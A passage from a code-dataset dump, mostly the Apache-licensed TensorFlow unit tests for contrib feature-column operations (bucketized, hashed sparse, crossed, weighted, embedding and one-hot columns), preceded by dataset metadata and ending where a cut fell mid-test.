from . import spvcm | 19.6 | 19 | 0.755102 | 15 | 98 | 4.933333 | 0.466667 | 0.675676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193878 | 98 | 5 | 20 | 19.6 | 0.936709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a49e14c08a3de2e010962a6e6ad5d4003e0addd | 101,433 | py | Python | tensorflow/contrib/layers/python/layers/feature_column_ops_test.py | jksk/tensorflow | 48fb73a1c94ee2409382225428063d3496dc651e | [
"Apache-2.0"
] | 2 | 2018-04-10T11:50:28.000Z | 2019-01-08T02:40:17.000Z | tensorflow/contrib/layers/python/layers/feature_column_ops_test.py | jksk/tensorflow | 48fb73a1c94ee2409382225428063d3496dc651e | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/layers/python/layers/feature_column_ops_test.py | jksk/tensorflow | 48fb73a1c94ee2409382225428063d3496dc651e | [
"Apache-2.0"
] | 6 | 2017-04-14T07:11:14.000Z | 2019-11-20T08:19:15.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.feature_column_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.contrib.layers.python.layers import feature_column_ops
from tensorflow.python.ops import init_ops
class TransformerTest(tf.test.TestCase):
def testRealValuedColumnIsIdentityTransformation(self):
real_valued = tf.contrib.layers.real_valued_column("price")
features = {"price": tf.constant([[20.], [110], [-3]])}
output = feature_column_ops._Transformer(features).transform(real_valued)
with self.test_session():
self.assertAllEqual(output.eval(), [[20.], [110], [-3]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[bucket])
self.assertEqual(len(output), 1)
self.assertIn(bucket, output)
with self.test_session():
self.assertAllEqual(output[bucket].eval(), [[2], [3], [0]])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 110], [110., 20], [-3, -3]])}
output = feature_column_ops._Transformer(features).transform(bucket)
with self.test_session():
self.assertAllEqual(output.eval(), [[2, 3], [3, 2], [0, 0]])
def testCachedTransformation(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
transformer = feature_column_ops._Transformer(features)
with self.test_session() as sess:
transformer.transform(bucket)
num_of_ops = len(sess.graph.get_operations())
# Verify that the second call to transform the same feature
# doesn't increase the number of ops.
transformer.transform(bucket)
self.assertEqual(num_of_ops, len(sess.graph.get_operations()))
def testSparseColumnWithHashBucket(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
with self.test_session():
self.assertEqual(output[hashed_sparse].values.dtype, tf.int64)
self.assertTrue(
all(x < 10 and x >= 0 for x in output[hashed_sparse].values.eval()))
self.assertAllEqual(output[hashed_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[hashed_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseIntColumnWithHashBucket(self):
"""Tests a sparse column with int values."""
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket(
"wire", 10, dtype=tf.int64)
wire_tensor = tf.SparseTensor(values=[101, 201, 301],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
with self.test_session():
self.assertEqual(output[hashed_sparse].values.dtype, tf.int64)
self.assertTrue(
all(x < 10 and x >= 0 for x in output[hashed_sparse].values.eval()))
self.assertAllEqual(output[hashed_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[hashed_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseColumnWithHashBucketWithDenseInputTensor(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(hashed_sparse)
with self.test_session():
# While the input is a dense Tensor, the output should be a SparseTensor.
self.assertIsInstance(output, tf.SparseTensor)
self.assertEqual(output.values.dtype, tf.int64)
self.assertTrue(all(x < 10 and x >= 0 for x in output.values.eval()))
self.assertAllEqual(output.indices.eval(),
[[0, 0], [0, 1], [1, 0], [1, 1]])
self.assertAllEqual(output.shape.eval(), [2, 2])
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(
tf.contrib.layers.embedding_column(hashed_sparse, 10))
expected = feature_column_ops._Transformer(features).transform(
hashed_sparse)
with self.test_session():
self.assertAllEqual(output.values.eval(), expected.values.eval())
self.assertAllEqual(output.indices.eval(), expected.indices.eval())
self.assertAllEqual(output.shape.eval(), expected.shape.eval())
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
def testSparseColumnWithKeys(self):
keys_sparse = tf.contrib.layers.sparse_column_with_keys(
"wire", ["marlo", "omar", "stringer"])
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[keys_sparse])
self.assertEqual(len(output), 1)
self.assertIn(keys_sparse, output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertEqual(output[keys_sparse].values.dtype, tf.int64)
self.assertAllEqual(output[keys_sparse].values.eval(), [1, 2, 0])
self.assertAllEqual(output[keys_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[keys_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseColumnWithKeysWithDenseInputTensor(self):
keys_sparse = tf.contrib.layers.sparse_column_with_keys(
"wire", ["marlo", "omar", "stringer", "rick"])
wire_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(keys_sparse)
with self.test_session():
tf.initialize_all_tables().run()
# While the input is a dense Tensor, the output should be a SparseTensor.
self.assertIsInstance(output, tf.SparseTensor)
self.assertEqual(output.dtype, tf.int64)
self.assertAllEqual(output.values.eval(), [1, 2, 0, 3])
self.assertAllEqual(output.indices.eval(),
[[0, 0], [0, 1], [1, 0], [1, 1]])
self.assertAllEqual(output.shape.eval(), [2, 2])
def testSparseColumnWithHashBucket_IsIntegerized(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_integerized_feature(
"wire", 10)
wire_tensor = tf.SparseTensor(values=[100, 1, 25],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
with self.test_session():
self.assertEqual(output[hashed_sparse].values.dtype, tf.int32)
self.assertTrue(
all(x < 10 and x >= 0 for x in output[hashed_sparse].values.eval()))
self.assertAllEqual(output[hashed_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[hashed_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseColumnWithHashBucketWithDenseInputTensor_IsIntegerized(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_integerized_feature(
"wire", 10)
# wire_tensor = tf.SparseTensor(values=[100, 1, 25],
# indices=[[0, 0], [1, 0], [1, 1]],
# shape=[2, 2])
wire_tensor = tf.constant([[100, 0], [1, 25]])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(hashed_sparse)
with self.test_session():
# While the input is a dense Tensor, the output should be a SparseTensor.
self.assertIsInstance(output, tf.SparseTensor)
self.assertEqual(output.values.dtype, tf.int32)
self.assertTrue(all(x < 10 and x >= 0 for x in output.values.eval()))
self.assertAllEqual(output.indices.eval(),
[[0, 0], [0, 1], [1, 0], [1, 1]])
self.assertAllEqual(output.shape.eval(), [2, 2])
def testWeightedSparseColumn(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[weighted_ids])
self.assertEqual(len(output), 1)
self.assertIn(weighted_ids, output)
print(output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertAllEqual(output[weighted_ids][0].shape.eval(),
ids_tensor.shape.eval())
self.assertAllEqual(output[weighted_ids][0].indices.eval(),
ids_tensor.indices.eval())
self.assertAllEqual(output[weighted_ids][0].values.eval(), [2, 2, 0])
self.assertAllEqual(output[weighted_ids][1].shape.eval(),
weights_tensor.shape.eval())
self.assertAllEqual(output[weighted_ids][1].indices.eval(),
weights_tensor.indices.eval())
self.assertEqual(output[weighted_ids][1].values.dtype, tf.float32)
self.assertAllEqual(output[weighted_ids][1].values.eval(),
weights_tensor.values.eval())
def testCrossColumn(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=15)
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[country_language])
self.assertEqual(len(output), 1)
self.assertIn(country_language, output)
with self.test_session():
self.assertEqual(output[country_language].values.dtype, tf.int64)
self.assertTrue(
all(x < 15 and x >= 0 for x in output[country_language].values.eval(
)))
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=15)
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[country_price])
self.assertEqual(len(output), 1)
self.assertIn(country_price, output)
with self.test_session():
self.assertEqual(output[country_price].values.dtype, tf.int64)
self.assertTrue(
all(x < 15 and x >= 0 for x in output[country_price].values.eval()))
def testCrossWithMultiDimensionBucketizedColumn(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=1000)
with tf.Graph().as_default():
features = {"price": tf.constant([[20., 210.], [110., 50.], [-3., -30.]]),
"country": tf.SparseTensor(values=["US", "SV", "US"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[country_price],
num_outputs=1))
weights = column_to_variable[country_price][0]
grad = tf.squeeze(tf.gradients(output, weights)[0].values)
with self.test_session():
tf.global_variables_initializer().run()
self.assertEqual(len(grad.eval()), 6)
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[country_price])
self.assertEqual(len(output), 1)
self.assertIn(country_price, output)
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=15)
wire = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_country_price = tf.contrib.layers.crossed_column(
[wire, country_price], hash_bucket_size=15)
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [0, 1], [0, 2]],
shape=[1, 3])
}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[wire_country_price])
self.assertEqual(len(output), 1)
self.assertIn(wire_country_price, output)
with self.test_session():
self.assertEqual(output[wire_country_price].values.dtype, tf.int64)
self.assertTrue(
all(x < 15 and x >= 0 for x in output[wire_country_price].values.eval(
)))
def testIfFeatureTableContainsTransformationReturnIt(self):
any_column = tf.contrib.layers.sparse_column_with_hash_bucket("sparse", 10)
features = {any_column: "any-thing-even-not-a-tensor"}
output = feature_column_ops._Transformer(features).transform(any_column)
self.assertEqual(output, "any-thing-even-not-a-tensor")
class CreateInputLayersForDNNsTest(tf.test.TestCase):
def testAllDNNColumns(self):
sparse_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
real_valued_column = tf.contrib.layers.real_valued_column("income", 2)
one_hot_column = tf.contrib.layers.one_hot_column(sparse_column)
embedding_column = tf.contrib.layers.embedding_column(sparse_column, 10)
features = {
"ids": tf.SparseTensor(
values=["c", "b", "a"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1]),
"income": tf.constant([[20.3, 10], [110.3, 0.4], [-3.0, 30.4]])
}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_column,
embedding_column,
real_valued_column])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(output.eval().shape, [3, 2 + 4 + 10])
def testRealValuedColumn(self):
real_valued = tf.contrib.layers.real_valued_column("price")
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval())
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.],
[110, 0.],
[-3, 30]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval())
def testRealValuedColumnWithNormalizer(self):
real_valued = tf.contrib.layers.real_valued_column(
"price", normalizer=lambda x: x - 2)
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval() - 2)
def testRealValuedColumnWithMultiDimensionsAndNormalizer(self):
real_valued = tf.contrib.layers.real_valued_column(
"price", 2, normalizer=lambda x: x - 2)
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval() - 2)
def testBucketizedColumnSucceedsForDNN(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 0, 1, 0], [0, 0, 0, 1], [1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testBucketizedColumnWithNormalizerSucceedsForDNN(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column(
"price", normalizer=lambda x: x - 15),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 1, 0, 0], [0, 0, 1, 0], [1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testBucketizedColumnWithMultiDimensionsSucceedsForDNN(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
# buckets [2, 3], [3, 2], [0, 0]. dimension = 2
features = {"price": tf.constant([[20., 200],
[110, 50],
[-3, -3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testOneHotColumnFromWeightedSparseColumnFails(self):
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
ids_tensor = tf.SparseTensor(
values=["c", "b", "a", "c"],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
weighted_ids_column = tf.contrib.layers.weighted_sparse_column(ids_column,
"weights")
weights_tensor = tf.SparseTensor(
values=[10.0, 20.0, 30.0, 40.0],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
features = {"ids": ids_tensor, "weights": weights_tensor}
one_hot_column = tf.contrib.layers.one_hot_column(weighted_ids_column)
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
with self.assertRaisesRegexp(
ValueError,
"one_hot_column does not yet support weighted_sparse_column"):
_ = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_column])
def testOneHotColumnFromSparseColumnWithKeysSucceedsForDNN(self):
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
ids_tensor = tf.SparseTensor(
values=["c", "b", "a"], indices=[[0, 0], [1, 0], [2, 0]], shape=[3, 1])
one_hot_sparse = tf.contrib.layers.one_hot_column(ids_column)
features = {"ids": ids_tensor}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual([[0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 0, 0]],
output.eval())
def testOneHotColumnFromMultivalentSparseColumnWithKeysSucceedsForDNN(self):
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
ids_tensor = tf.SparseTensor(
values=["c", "b", "a", "c"],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
one_hot_sparse = tf.contrib.layers.one_hot_column(ids_column)
features = {"ids": ids_tensor}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual([[0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 1, 0]],
output.eval())
def testOneHotColumnFromSparseColumnWithIntegerizedFeaturePassesForDNN(self):
ids_column = tf.contrib.layers.sparse_column_with_integerized_feature(
"ids", bucket_size=4)
one_hot_sparse = tf.contrib.layers.one_hot_column(ids_column)
features = {"ids": tf.SparseTensor(
values=[2, 1, 0, 2],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual([[0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 1, 0]],
output.eval())
def testOneHotColumnFromSparseColumnWithHashBucketSucceedsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("feat", 10)
wire_tensor = tf.SparseTensor(
values=["a", "b", "c1", "c2"],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
features = {"feat": wire_tensor}
one_hot_sparse = tf.contrib.layers.one_hot_column(hashed_sparse)
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual([3, 10], output.eval().shape)
def testEmbeddingColumnSucceedsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(
values=["omar", "stringer", "marlo", "xx", "yy"],
indices=[[0, 0], [1, 0], [1, 1], [2, 0], [3, 0]],
shape=[4, 2])
features = {"wire": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(output.eval().shape, [4, 10])
def testScatteredEmbeddingColumnSucceedsForDNN(self):
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo", "omar"],
indices=[[0, 0], [1, 0], [1, 1], [2, 0]],
shape=[3, 2])
features = {"wire": wire_tensor}
# Big enough hash space so that hopefully there is no collision
embedded_sparse = tf.contrib.layers.scattered_embedding_column(
"wire", 1000, 3,
tf.contrib.layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
output = tf.contrib.layers.input_from_feature_columns(
features, [embedded_sparse], weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
grad = tf.gradients(output, weights)
with self.test_session():
tf.global_variables_initializer().run()
gradient_values = []
# Collect the gradient from the different partitions (one in this test)
for p in range(len(grad)):
gradient_values.extend(grad[p].values.eval())
gradient_values.sort()
self.assertAllEqual(gradient_values, [0.5]*6 + [2]*3)
def testEmbeddingColumnWithInitializerSucceedsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
init_value = 133.7
embeded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10, initializer=tf.constant_initializer(init_value))
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
output_eval = output.eval()
self.assertAllEqual(output_eval.shape, [2, 10])
self.assertAllClose(output_eval, np.tile(init_value, [2, 10]))
def testEmbeddingColumnWithMultipleInitializersFails(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embedded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10,
initializer=tf.truncated_normal_initializer(mean=42,
stddev=1337))
embedded_sparse_alternate = tf.contrib.layers.embedding_column(
hashed_sparse,
10,
initializer=tf.truncated_normal_initializer(mean=1337,
stddev=42))
# Makes sure that trying to use different initializers with the same
# embedding column explicitly fails.
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
"Duplicate feature column key found for column: wire_embedding"):
tf.contrib.layers.input_from_feature_columns(
features, [embedded_sparse, embedded_sparse_alternate])
def testEmbeddingColumnWithWeightedSparseColumnSucceedsForDNN(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(weighted_ids, 10)
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(output.eval().shape, [2, 10])
def testEmbeddingColumnWithCrossedColumnSucceedsForDNN(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(crossed, 10)
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(output.eval().shape, [2, 10])
def testSparseColumnFailsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "Error creating input layer for column: wire"):
tf.global_variables_initializer().run()
tf.contrib.layers.input_from_feature_columns(features, [hashed_sparse])
def testWeightedSparseColumnFailsForDNN(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
"Error creating input layer for column: ids_weighted_by_weights"):
tf.initialize_all_tables().run()
tf.contrib.layers.input_from_feature_columns(features, [weighted_ids])
def testCrossedColumnFailsForDNN(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "Error creating input layer for column: aaa_X_bbb"):
tf.global_variables_initializer().run()
tf.contrib.layers.input_from_feature_columns(features, [crossed])
def testDeepColumnsSucceedForDNN(self):
real_valued = tf.contrib.layers.real_valued_column("income", 3)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"income": tf.constant([[20., 10, -5], [110, 0, -7], [-3, 30, 50]]),
"price": tf.constant([[20., 200], [110, 2], [-20, -30]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
embeded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10, initializer=tf.constant_initializer(133.7))
output = tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
# size of output = 3 (real_valued) + 2 * 4 (bucket) + 10 (embedding) = 21
self.assertAllEqual(output.eval().shape, [3, 21])
def testEmbeddingColumnForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
features = {"wire": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
1,
